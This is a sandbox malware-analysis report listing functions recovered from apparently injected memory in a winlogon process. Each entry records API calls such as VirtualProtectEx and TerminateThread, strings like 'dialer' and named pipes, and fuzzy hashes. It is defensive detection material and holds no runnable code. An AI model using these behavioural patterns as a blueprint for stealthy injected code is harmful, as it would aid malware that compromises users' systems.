Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 4eed410deb29fe02e4d6a9c82d05d52405034fca4d03115e108f9fb8ebd77e49
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: DF116031718B5186E760CB6AE844369A6B8F788FF6F044234EADE877A5DF7CC5048744

Function 000001F6C88B1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F6C88B1BCD
GetLastError.KERNEL32 ref: 000001F6C88B1BD9
CloseHandle.KERNEL32 ref: 000001F6C88B1BF1
CreateFileW.KERNEL32 ref: 000001F6C88B1C1C
WriteConsoleW.KERNEL32 ref: 000001F6C88B1C3B

Strings

CONOUT$, xrefs: 000001F6C88B1BFD

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 9f56a6bc4adcefbd683cca615f26c7eee689423ff04883cc578c46eeb651b86c
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: D6115831215B4286E760CB66EC943B9A2E8F7C8BF4F044234EAD987BA4DB78C9048744

Function 000001F6C8905C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F6C8905C4B
GetThreadContext.KERNEL32 ref: 000001F6C8905DB5

Part of subcall function 000001F6C8905A40: GetCurrentThreadId.KERNEL32 ref: 000001F6C8905A44

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 7b4408f94117f8152afc9a19360d4c0f5e0da9992b40bf104797cbbcd7f7a6b9
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 9AD18E76209B8985DA70DB1AE4943AA77B4F7CCB95F100126EACD47BA6DF3DC541CB00

Function 000001F6C89030B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C89030D7
HeapAlloc.KERNEL32 ref: 000001F6C89030EA
StrCmpNIW.SHLWAPI ref: 000001F6C890316B
GetProcessHeap.KERNEL32 ref: 000001F6C89031D1
HeapFree.KERNEL32 ref: 000001F6C89031DF

Strings

dialer, xrefs: 000001F6C8903164

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: c186e6d14c8712cbf3ebdfcbe23b2d83f210ab27c71bb88b81e885ececbefb71
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 2331B831305B9692E771DF3AA8802B967A5FB4C7A6F0440309EC807B56EF38C4A19700

Function 000001F6C88A30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C88A30D7
HeapAlloc.KERNEL32 ref: 000001F6C88A30EA
StrCmpNIW.SHLWAPI ref: 000001F6C88A316B
GetProcessHeap.KERNEL32 ref: 000001F6C88A31D1
HeapFree.KERNEL32 ref: 000001F6C88A31DF

Strings

dialer, xrefs: 000001F6C88A3164

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 97c60e1e0a6a9b6dae114924340346f58c29abd4490de8d93274dcc5352f8b3e
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 5C319031702B5292EB75DF66A8442F963A4FB44BA4F088034EFC987FD5EB38D4A18700

Function 000001F6C8901A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F6C8901A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001F6C8901A58
PathFindFileNameW.SHLWAPI ref: 000001F6C8901A67
lstrlenW.KERNEL32 ref: 000001F6C8901A73
StrCpyW.SHLWAPI ref: 000001F6C8901A86
CloseHandle.KERNEL32 ref: 000001F6C8901A94

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: c872339ae331751b2789699cf50496a639643510f3afc311aebbc75a28dd2c29
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 83014031308A8296EB24DB26A4587A967B5F788FE2F484435DECE43755DF3CC985C740

Function 000001F6C88A1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F6C88A1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001F6C88A1A58
PathFindFileNameW.SHLWAPI ref: 000001F6C88A1A67
lstrlenW.KERNEL32 ref: 000001F6C88A1A73
StrCpyW.SHLWAPI ref: 000001F6C88A1A86
CloseHandle.KERNEL32 ref: 000001F6C88A1A94

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: eca26e4a6466a04f74bbf01205291164c4c907276368159b7bf00aba03710cb4
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 5E014035305A4296EB24DB62A8587B963A5F788FE0F484435DFCA83B94DF3CD985C740

Function 000001F6C89037AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F6C89037C8
GetCurrentProcess.KERNEL32 ref: 000001F6C89037D6
VirtualProtectEx.KERNEL32 ref: 000001F6C89037F8
GetCurrentProcess.KERNEL32 ref: 000001F6C8903819
VirtualProtectEx.KERNEL32 ref: 000001F6C890383A
TerminateThread.KERNEL32 ref: 000001F6C8903849

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: cea34d47a76406527dac14a875728ae1dd6e3f740ddcab315e6f04ee470d28b4
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 97111B7571574286FB34DB79E8497AA66B4BB48FA2F040439CEC947756EF3CC5089700

Function 000001F6C88A37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F6C88A37C8
GetCurrentProcess.KERNEL32 ref: 000001F6C88A37D6
VirtualProtectEx.KERNEL32 ref: 000001F6C88A37F8
GetCurrentProcess.KERNEL32 ref: 000001F6C88A3819
VirtualProtectEx.KERNEL32 ref: 000001F6C88A383A
TerminateThread.KERNEL32 ref: 000001F6C88A3849

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 5dd3af9212ec6a93453c6174e6fadd9e46857c451a33f0ae477a02035edd323a
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: F0111B7561274286EB34DB71E8197B666A4FB88BA1F040438DAC947BA4EF3CC4098710

Function 000001F6C8901AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F6C8901AD8
StrCmpNIW.SHLWAPI ref: 000001F6C8901AF2
lstrlenW.KERNEL32 ref: 000001F6C8901B01
StrCpyW.SHLWAPI ref: 000001F6C8901B16

Strings

\\?\, xrefs: 000001F6C8901AE6

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: b923fe907f02e345a4b5fb28040116ba53e62a82edc1afcad605a8b520e690c9
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 6BF0443230468292E770DB79F4943A96774F788BA9F848034CAC94795ADF2CC689C700

Function 000001F6C88A1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F6C88A1AD8
StrCmpNIW.SHLWAPI ref: 000001F6C88A1AF2
lstrlenW.KERNEL32 ref: 000001F6C88A1B01
StrCpyW.SHLWAPI ref: 000001F6C88A1B16

Strings

\\?\, xrefs: 000001F6C88A1AE6

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 4d02bb18fc4c128b1595ddecd1839d936fe506640f636b186fd94f9e09df3e7e
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 54F0317230564292E770CB75F8943F96764F784BA8F848034DAC947DA4DE3CC649C700

Function 000001F6C8903200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001F6C8903222
StrCpyW.SHLWAPI ref: 000001F6C8903232
StrCatW.SHLWAPI ref: 000001F6C890323E
PathCombineW.SHLWAPI ref: 000001F6C890324C

Strings

\\.\pipe\, xrefs: 000001F6C8903218

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: d8e2f81bdc39dd8a763d94b6984240439fbfc6f8a96d2e6f5b229b451e2667a0
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 89F0893030878291EA60DB2BB9441B95665AB48FE1F044531DDD647B1ACF2CC4419300

Function 000001F6C88A3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001F6C88A3222
StrCpyW.SHLWAPI ref: 000001F6C88A3232
StrCatW.SHLWAPI ref: 000001F6C88A323E
PathCombineW.SHLWAPI ref: 000001F6C88A324C

Strings

\\.\pipe\, xrefs: 000001F6C88A3218

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: a7f14f046b0015232b1d132be113cd593c54cbea7d7b46440bfabf247b709fce
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 9DF01234305B9292EA24CB63BD551B96661EB88FE1F089131DFDA47FA8DE2CC5458700

Function 000001F6C890A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F6C890A154
GetProcAddress.KERNEL32 ref: 000001F6C890A16A
FreeLibrary.KERNEL32 ref: 000001F6C890A187

Strings

mscoree.dll, xrefs: 000001F6C890A14B
CorExitProcess, xrefs: 000001F6C890A163

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 0c135f359162b87c40b040ecf8e08eed3907e8d3640b5531d40964554bc2951c
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 80F05E7132568291EFA4CB78F8843B967B4AB48BA3F44203A95CB46562CF3CC488C700

Function 000001F6C88AA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F6C88AA154
GetProcAddress.KERNEL32 ref: 000001F6C88AA16A
FreeLibrary.KERNEL32 ref: 000001F6C88AA187

Strings

mscoree.dll, xrefs: 000001F6C88AA14B
CorExitProcess, xrefs: 000001F6C88AA163

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 400815281f8fd3bd1b4bd73d528fb2581cd80e308cd8a9b4b68b37565725e693
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: E8F0F471312A4691EF64CF70EC843F513A0AB887A1F441439D5CB86DA5DE2CC489C710

Function 000001F6C8903878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F6C8903886
GetCurrentProcess.KERNEL32 ref: 000001F6C89038B4
VirtualProtectEx.KERNEL32 ref: 000001F6C89038D6
GetCurrentProcess.KERNEL32 ref: 000001F6C89038F4
VirtualProtectEx.KERNEL32 ref: 000001F6C8903915

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 0feb9dddd18bffbd87194d378f9bbeb46ea8747d752cddb79e6c2150b894265a
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: A2113C3A708B8282EB24DB6AF4442A9A6B4F748BA5F040039DED907796EF3DC504D700

Function 000001F6C8908400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F6C890840B
RtlLookupFunctionEntry.NTDLL ref: 000001F6C8908425
RtlVirtualUnwind.NTDLL ref: 000001F6C890845C

Strings

NtQuerySystemInformation, xrefs: 000001F6C8908402

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: 0894144dc5df0b21d97b2f4f6278bcabcfe2ded288764f170a645f21d5849889
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: A9F0817221875182EB20CB2AF8403AA6765F789BE1F440134EECA47B44DF38C586CB04

Function 000001F6C88A8400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F6C88A840B
RtlLookupFunctionEntry.NTDLL ref: 000001F6C88A8425
RtlVirtualUnwind.NTDLL ref: 000001F6C88A845C

Strings

NtQuerySystemInformation, xrefs: 000001F6C88A8402

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: 4795f706462720542ee9b2df7de1db2341123beef952fac87932aa4eae4141b6
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: 48F03C76615B5282EB24CB25F8407BA63A1F7CDBA4F444134EECA97B94DF38C586CB00

Function 000001F6C88A14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C88A14D5
HeapFree.KERNEL32 ref: 000001F6C88A14E4
GetProcessHeap.KERNEL32 ref: 000001F6C88A14F0
HeapFree.KERNEL32 ref: 000001F6C88A14FF
GetProcessHeap.KERNEL32 ref: 000001F6C88A152A

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 104b9d672af7b0a12060ccde14a28cfa905bd0ac1148ffacc10076ae75ea6854
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: DA115A36516B89D6EB64DFAAA8442AA73A5F389F90F044029EBCA43B55DF3CC051C700

Function 000001F6C8910860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001F6C8910960
GetLastError.KERNEL32 ref: 000001F6C89109EA

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 23c1b7e45f70aab671c5e8511f78634cfbbe75f74747e26c5c1871c0ac006660
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 1981DF3271865299FB70EB7998543FD26A8F748BA6F440236DECA53793DB36C442E310

Function 000001F6C88B0860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001F6C88B0960
GetLastError.KERNEL32 ref: 000001F6C88B09EA

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 0352d528b6c8f269e5ccc78172830488205fd8a64a7a182c8b6a33ff2d050baa
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0581BC32612A1299FB70DB758D503FD2AA0F784BA8F445536DECA57FE2DA34C842C714

Function 000001F6C8907A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F6C8907A6C
GetCurrentThreadId.KERNEL32 ref: 000001F6C8907A7A
GetCurrentProcessId.KERNEL32 ref: 000001F6C8907A86
QueryPerformanceCounter.KERNEL32 ref: 000001F6C8907A96

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: 9ccae65f76f946e0a5d058dda31765ef2638e92f9b8fe3c80c3b818d55abccb1
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: 85112E32304F429AEB20CF74E8553A433A8F71DB69F041A31EAEE477A5DB38C1958340

Function 000001F6C88A7A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F6C88A7A6C
GetCurrentThreadId.KERNEL32 ref: 000001F6C88A7A7A
GetCurrentProcessId.KERNEL32 ref: 000001F6C88A7A86
QueryPerformanceCounter.KERNEL32 ref: 000001F6C88A7A96

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: a7114d53a6838eb99ecf4af792b034426132d3dd2562423eab34ecabcb5071ea
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: 6D111832201B429AEB20CF70EC553B933A4F759768F041A31EAED87B94DB38D1A58380

Function 000001F6C89026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F6C89027D4
StrCpyW.SHLWAPI ref: 000001F6C89027ED

Strings

\\.\pipe\, xrefs: 000001F6C89027DF

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: a2f142a994441ce1b315a3817b48307e0f5c4eea4e59c1d9023a818f1ae6f442
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 2171B1362047C286E775DABD99843FA6795F74CBA6F44403ADECA43B8ADF34C6049701

Function 000001F6C88A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F6C88A27D4
StrCpyW.SHLWAPI ref: 000001F6C88A27ED

Strings

\\.\pipe\, xrefs: 000001F6C88A27DF

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: eb67bfe616382ca5e450c87514fb8753428d949155b60d1ed6f75a13b3fabdd4
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: A471AF3221678286EB74DB3599543FAA791F785BA4F48003AEECA53FD9DF35CA048700

Function 000001F6C89090D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 000001F6C89091E7

Strings

f, xrefs: 000001F6C8909116
csm, xrefs: 000001F6C890917E

Memory Dump Source

